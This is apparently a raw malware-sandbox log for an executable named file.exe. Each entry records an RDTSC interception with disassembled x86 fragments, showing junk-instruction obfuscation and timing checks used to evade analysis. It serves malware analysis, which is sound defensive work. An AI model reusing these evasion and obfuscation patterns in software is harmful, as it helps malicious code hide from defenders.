Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD5CB second address: EBD5CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD5CF second address: EBD63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF7914BECFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAF7914BED5h 0x00000013 pop edx 0x00000014 nop 0x00000015 sbb esi, 4F1C3EF6h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e pop esi 0x0000001f call 00007FAF7914BEC9h 0x00000024 push edx 0x00000025 push edx 0x00000026 jmp 00007FAF7914BED8h 0x0000002b pop edx 0x0000002c pop edx 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 jmp 00007FAF7914BECDh 0x00000036 pop eax 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD63F second address: EBD682 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F537h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FAF78D3F52Fh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAF78D3F531h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD7F8 second address: EBD816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7914BED1h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD816 second address: EBD81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD81B second address: EBD820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD820 second address: EBD826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD826 second address: EBD86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FAF7914BED2h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jp 00007FAF7914BED0h 0x00000018 pushad 0x00000019 ja 00007FAF7914BEC6h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FAF7914BED2h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD86D second address: EBD873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD873 second address: EBD877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD877 second address: EBD903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FAF78D3F528h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 pushad 0x00000024 mov edi, dword ptr [ebp+122D29D1h] 0x0000002a movzx ecx, ax 0x0000002d popad 0x0000002e push 00000003h 0x00000030 mov edx, dword ptr [ebp+122D2925h] 0x00000036 push 00000000h 0x00000038 mov edi, edx 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007FAF78D3F528h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 call 00007FAF78D3F529h 0x0000005b jmp 00007FAF78D3F536h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jnl 00007FAF78D3F528h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD903 second address: EBD909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD909 second address: EBD90D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD90D second address: EBD911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD911 second address: EBD985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FAF78D3F52Ah 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FAF78D3F534h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007FAF78D3F52Fh 0x00000021 pop eax 0x00000022 movsx ecx, dx 0x00000025 lea ebx, dword ptr [ebp+12452442h] 0x0000002b call 00007FAF78D3F538h 0x00000030 add dword ptr [ebp+122D1D34h], esi 0x00000036 pop edi 0x00000037 xchg eax, ebx 0x00000038 jp 00007FAF78D3F530h 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD9FF second address: EBDA05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBDAA1 second address: EBDADD instructions: 0x00000000 rdtsc 0x00000002 js 00007FAF78D3F528h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 5F626312h 0x00000013 jmp 00007FAF78D3F537h 0x00000018 lea ebx, dword ptr [ebp+1245244Dh] 0x0000001e stc 0x0000001f and si, E340h 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pop eax 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBDADD second address: EBDAE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBDAE1 second address: EBDAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBDAEB second address: EBDAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDF514 second address: EDF518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD4AC second address: EDD4B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FAF7914BEC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD4B7 second address: EDD4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD4BD second address: EDD4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAF7914BED3h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jnc 00007FAF7914BEC6h 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD4E1 second address: EDD4F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF78D3F532h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD8F2 second address: EDD8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDD8F6 second address: EDD8FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDE122 second address: EDE12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FAF7914BEC6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDE3F2 second address: EDE3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDEEFD second address: EDEF4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED1h 0x00000007 jmp 00007FAF7914BED9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jns 00007FAF7914BEC6h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FAF7914BECBh 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jng 00007FAF7914BEC6h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDF388 second address: EDF393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAF78D3F526h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE1624 second address: EE165F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FAF7914BED5h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jl 00007FAF7914BED2h 0x00000013 jmp 00007FAF7914BECCh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FAF7914BECAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE165F second address: EE1663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE2EB7 second address: EE2EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE2EBB second address: EE2ECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FAF78D3F526h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA3295 second address: EA329F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA329F second address: EA32A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA32A3 second address: EA32BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED5h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA32BE second address: EA32EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F52Eh 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jg 00007FAF78D3F526h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jmp 00007FAF78D3F52Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA32EC second address: EA3300 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF7914BECDh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FCD7 second address: E9FCDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FCDB second address: E9FCE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FCE1 second address: E9FD0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FAF78D3F530h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FD0D second address: E9FD29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7914BED3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FD29 second address: E9FD33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAF78D3F526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FD33 second address: E9FD3F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007FAF7914BEC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FD3F second address: E9FD4A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007FAF78D3F526h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEA6C6 second address: EEA6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FAF7914BEC6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEA6D3 second address: EEA6D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEA866 second address: EEA89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAF7914BED1h 0x0000000a popad 0x0000000b jo 00007FAF7914BEF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAF7914BED6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEA9FE second address: EEAA07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEAA07 second address: EEAA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 jng 00007FAF7914BEC6h 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007FAF7914BEC6h 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007FAF7914BEC8h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEAB5A second address: EEABA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FAF78D3F526h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FAF78D3F537h 0x00000011 jmp 00007FAF78D3F537h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007FAF78D3F52Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEAE51 second address: EEAE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEAE59 second address: EEAE5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEAE5D second address: EEAE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEAE63 second address: EEAE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FAF78D3F526h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEAFC9 second address: EEAFFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FAF7914BEC6h 0x00000011 jmp 00007FAF7914BED7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EECAB7 second address: EECABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EECABD second address: EECAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EECAC2 second address: EECAF2 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAF78D3F538h 0x00000008 jmp 00007FAF78D3F52Ch 0x0000000d jl 00007FAF78D3F526h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007FAF78D3F526h 0x0000001e jmp 00007FAF78D3F52Bh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EECAF2 second address: EECAF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EECAF8 second address: EECB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF78D3F52Dh 0x0000000b pushad 0x0000000c jl 00007FAF78D3F526h 0x00000012 pushad 0x00000013 popad 0x00000014 jne 00007FAF78D3F526h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB223B second address: EB2265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push ecx 0x00000009 jmp 00007FAF7914BED9h 0x0000000e js 00007FAF7914BECCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EED266 second address: EED26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EED26B second address: EED2A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jng 00007FAF7914BEC6h 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FAF7914BED9h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EED3E6 second address: EED3F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EED5B1 second address: EED5B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EED838 second address: EED858 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF78D3F534h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EED858 second address: EED86A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EED9D2 second address: EED9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EED9D6 second address: EED9FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e js 00007FAF7914BEC6h 0x00000014 jmp 00007FAF7914BED4h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEDF61 second address: EEDF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jne 00007FAF78D3F526h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 jnc 00007FAF78D3F526h 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEE181 second address: EEE193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jng 00007FAF7914BEC6h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEE193 second address: EEE198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEE375 second address: EEE37A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEE37A second address: EEE3E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FAF78D3F528h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov si, cx 0x00000025 xchg eax, ebx 0x00000026 jbe 00007FAF78D3F53Ch 0x0000002c pushad 0x0000002d jmp 00007FAF78D3F52Eh 0x00000032 jno 00007FAF78D3F526h 0x00000038 popad 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d jmp 00007FAF78D3F52Ah 0x00000042 jmp 00007FAF78D3F536h 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEF350 second address: EEF354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEF354 second address: EEF3C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov si, dx 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FAF78D3F528h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FAF78D3F528h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 call 00007FAF78D3F52Fh 0x00000048 jbe 00007FAF78D3F526h 0x0000004e pop esi 0x0000004f mov esi, dword ptr [ebp+122D256Ch] 0x00000055 xchg eax, ebx 0x00000056 pushad 0x00000057 pushad 0x00000058 jnp 00007FAF78D3F526h 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEF3C9 second address: EEF3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FAF7914BEC6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF0570 second address: EF0577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
